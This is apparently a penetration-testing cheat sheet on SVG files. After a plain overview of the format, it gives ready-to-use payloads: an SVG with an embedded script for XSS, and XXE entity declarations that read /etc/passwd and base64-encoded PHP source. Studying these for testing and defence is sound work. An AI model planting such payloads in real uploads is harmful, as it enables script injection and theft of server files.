SVG

The SVG file type, or Scalable Vector Graphics, is an open standard defined by the World Wide Web Consortium (W3C) for representing two-dimensional graphics using XML. Unlike raster formats such as JPEG or PNG, which store images as pixel grids, SVG defines shapes, paths, text, and colors mathematically, allowing graphics to scale to any resolution without loss of quality. This characteristic makes SVG ideal for icons, diagrams, logos, and illustrations that must remain sharp across different screen sizes and display densities.

Because SVG is text-based and structured in XML, its contents can be created, edited, or inspected directly with a text editor. The format supports styling via CSS, scripting via JavaScript, and interactive elements such as hyperlinks or animations, effectively bridging the gap between static images and dynamic web content. While these features provide flexibility, they also introduce potential attack vectors. Maliciously crafted SVGs can include embedded scripts or external references that may be abused in environments where proper sanitization is absent.

XSS

We can include XSS payloads within the XML data of SVG images. Once the image is displayed, the payload will be triggered.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

We can also perform XXEI attacks using SVG images which can be used for reading the web application's source files.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>